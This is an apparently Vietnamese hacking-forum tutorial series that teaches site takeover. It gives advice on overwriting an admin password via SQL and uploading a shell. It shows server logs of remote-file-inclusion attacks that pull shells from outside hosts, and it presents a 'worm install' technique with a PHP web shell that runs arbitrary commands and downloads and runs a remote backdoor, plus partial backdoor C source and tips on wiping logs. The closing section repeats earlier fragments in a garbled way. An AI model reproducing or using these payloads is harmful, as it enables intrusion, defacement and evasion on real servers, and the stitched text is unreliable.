các bước còn lại chắc mọi người biết, khỏi post lại nghen nếu gặp trường hợp thằng admin đặt second pass thì mình chạy câu sql để update cái pass của nó thành cái pass của mình, sau khi vào được admincp thì tìm cách upshell lên. longnhi, HCE Group Tutorial from Clarken (bài 2) How to hack ? What is underground world? Hack how ? 1) Dựa vào các lỗi ở milw0rm.com & các video exploit 2) Zone-h.org Vào site này bạn sẽ được thấy hàng loạt site bị deface hàng ngày bởi những hacker giỏi, nếu có trình độ bạn hoàn toàn có thể làm theo họ còn ko thì bạn có thể tìm được dấu tích của họ . Phần lớn các hacker ko để ý rằng kỹ thuật hack của họ lại bị lộ 1 cách hết sức thô thiển , đó cũng là lý do clarken có 1 loạt 0days exploit trong thời gian gần đây. VD: Code: 195.178.131.133 - - [13/Nov/2006:05:55:57 -0500] "GET /art/MamboLogin.php?IP=http://autocoutureinc.com/c.php.txt? HTTP/1.1" 404 318 "-" "libwww-perl/5.805" 58.186.145.209 - - [13/Nov/2006:05:55:59 -0500] "GET /art/uuid HTTP/1.1" 301 339 "http://petertodd.ca/art/16-2-intersector/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 203.162.202.137 - - [13/Nov/2006:05:55:59 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 58.186.145.209 - - [13/Nov/2006:05:56:00 -0500] "GET /ip-bar.php HTTP/1.1" 200 4621 "http://petertodd.ca/art/uuid/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 203.162.202.137 - - [13/Nov/2006:05:56:00 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 58.186.145.209 - - [13/Nov/2006:05:55:59 -0500] "GET /art/uuid/ HTTP/1.1" 200 24723 "http://petertodd.ca/art/16-2-intersector/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 58.186.145.209 - - [13/Nov/2006:05:56:03 -0500] "GET /tech HTTP/1.1" 301 335 "http://petertodd.ca/art/uuid/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en- US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 195.178.131.133 - - [13/Nov/2006:05:56:05 -0500] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://auto coutureinc.com/c.php.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.805" 58.186.145.209 - - [13/Nov/2006:05:56:04 -0500] "GET /tech/ HTTP/1.1" 200 24100 "http://petertodd.ca/art/uuid/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 58.186.145.209 - - [13/Nov/2006:05:56:04 -0500] "GET /ip-bar.php HTTP/1.1" 200 4629 "http://petertodd.ca/tech/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" 195.178.131.133 - - [13/Nov/2006:05:56:07 -0500] "GET /tech/MamboLogin.php?IP=http://autocoutureinc.com/c.php.txt? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" 195.178.131.133 - - [13/Nov/2006:05:56:08 -0500] "GET /art/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://a utocoutureinc.com/c.php.txt? HTTP/1.1" 404 342 "-" "libwww-perl/5.805" 203.162.202.137 - - [13/Nov/2006:05:56:09 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 203.162.202.137 - - [13/Nov/2006:05:56:10 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 85.92.134.206 - - [13/Nov/2006:05:56:11 -0500] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://autocout ureinc.com/c.php.txt? HTTP/1.1" 404 334 "-" "libwww-perl/5.79" 85.92.134.206 - - [13/Nov/2006:05:56:11 -0500] "GET /art/components/com_hashcash/server.php?mosConfig_absolute_path=http://autoc outureinc.com/c.php.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.79" 85.92.134.206 - - [13/Nov/2006:05:56:13 -0500] "GET /components/com_htmlarea3_xtd- c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://autocout ureinc.com/c.php.txt? HTTP/1.1" 404 365 "-" "libwww-perl/5.79" 64.151.90.220 - - [13/Nov/2006:05:56:16 -0500] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://autocout ureinc.com/c.in? HTTP/1.1" 404 334 "-" "libwww-perl/5.805" 64.151.90.220 - - [13/Nov/2006:05:56:17 -0500] "GET /art/components/com_hashcash/server.php?mosConfig_absolute_path=http://autoc outureinc.com/c.in? HTTP/1.1" 404 338 "-" "libwww-perl/5.805" 200.29.90.110 - - [13/Nov/2006:05:56:17 -0500] "GET /tech/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_a bsolute_path=http://autocoutureinc.com/c.php.txt? HTTP/1.1" 404 361 "-" "libwww-perl/5.805" 203.162.202.137 - - [13/Nov/2006:05:56:17 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 203.162.202.137 - - [13/Nov/2006:05:56:18 -0500] "GET /art/inurl:%22download.php?phpbb_root_path%22http://r0xintheworld.altervista.o rg/download/r57.txt?cmd=id? HTTP/1.1" 404 323 "-" "libwww-perl/5.803" 58.186.145.209 - - [13/Nov/2006:05:56:24 -0500] "GET /tech/electronics HTTP/1.1" 301 347 "http://petertodd.ca/tech/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" Mọi người thấy ko , gã hacker này dựa vào lỗi include Để ý nào : Code: http://autocoutureinc.com/c.php.txt Đây là 1 con shell 0days Con này cực kỳ đặc biệt , bản private của nó include rất nhiều chức năng , tiếc là clark chỉ mới có 8/10 phần của nó . Đây là source của con này: Code: http://andreas.id.au/mirrors/exploit.phps Nếu dùng con shell này ta sẽ có ngay shell # để getroot . Cái này kết hợp với worm install là 1 kỹ thuật cao cấp trong hack linux @clarken(HCE) Tutorial from Clarken (bài 3) -Người học võ thì có nội công và ngoại công . Quan văn thì cũng phải có mưu và trí . Học hack cũng phải có kỹ thuật và new exploit. Đa số hacker thường quan tâm đến bugs mới để có thể khai thác được nhiều , ít người quan tâm đến kỹ thuật Bây giờ clarken sẽ nêu ví dụ về kỹ thuật w0rm installed . Cái tên này do clark đặt ra dựa theo ý tưởng về 1 bộ film về hacker trên tivi (phim tối chủ nhật lâu rồi, quên tên rồi) . - 1 băng nhóm mafia đi săn những hacker hàng đầu thế giới để chuẩn bị hack ngân hàng - Sau 1 thời gian tìm kiếm nhóm đã gặp được Alex 1 hacker thứ 2 thế giới - Việc chuẩn bị hack được tiến hành như sau: + Trang bị dàn máy tính tốc độ cực cao + Lắp đặt đường mạng cáp quang + Trong đó có 1 máy dành cho Alex , ngoài ra có khoảng 10 hackers khác lo các máy kia. - Bắt đầu attack: + Gã Alex ngày xưa có cắm 1 con w0rm trên trang web này rồi giờ chỉ connect vào port xxxx là có shell # (xưa ko hiểu, giờ mới hiểu) + Các hacker kia đang type liên tục có vẻ là đang phá firewall , đánh lừa webmaster + Sau đó Alex wget 1 cái gì đó và exploit để được quyền root . + Tiếp theo anh ta cat /etc/passwd rồi dùng toàn bộ máy ở đây crack với những wordlist hàng chục Gygabyte . + Ngân hàng này lưu log ở 2 máy , 1 là máy server , 2 là 1 máy dùng wireless . - Alex chạy file perl clearlog.pl để xóa log ở máy server - Tiếp theo anh ta dùng thuật toán của mình để phá 256bit web để connect vào máy wireless xóa log file. chuyện có thể dừng ở đây . Sau đây là kỹ thuật worm install: Ngày xưa sau khi public bug phpbb < 2.0.12 , nhiều người chỉ biết đến fake cookie để thành admin . Nhưng có 1 nhóm hacker TQ đã sử dụng kỹ thuật worm install. (Hình như gã đang ở top zone-h cũng trong nhóm này) Here is the code: System was exploited telnet to the port you have your backdoor set to listen on. Code: shell.php <? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!! $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> backdoor.c Code: #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void help(char *program_name); int main(int argc, char *argv[]) { struct sockaddr_in trg; struct hostent *he; int sockfd, buff; char buffer[1024]; char *request; if(argc != 4 ) { help(argv[0]); exit(0); } he = gethostbyname(argv[1]); . site bị deface hàng ngày bởi những hacker giỏi, nếu có trình độ bạn hoàn toàn có thể làm theo họ còn ko thì bạn có thể tìm được dấu tích của họ . Phần lớn các hacker ko để ý rằng kỹ thuật hack. do clark đặt ra dựa theo ý tưởng về 1 bộ film về hacker trên tivi (phim tối chủ nhật lâu rồi, quên tên rồi) . - 1 băng nhóm mafia đi săn những hacker hàng đầu thế giới để chuẩn bị hack ngân hàng. hackers khác lo các máy kia. - Bắt đầu attack: + Gã Alex ngày xưa có cắm 1 con w0rm trên trang web này rồi giờ chỉ connect vào port xxxx là có shell # (xưa ko hiểu, giờ mới hiểu) + Các hacker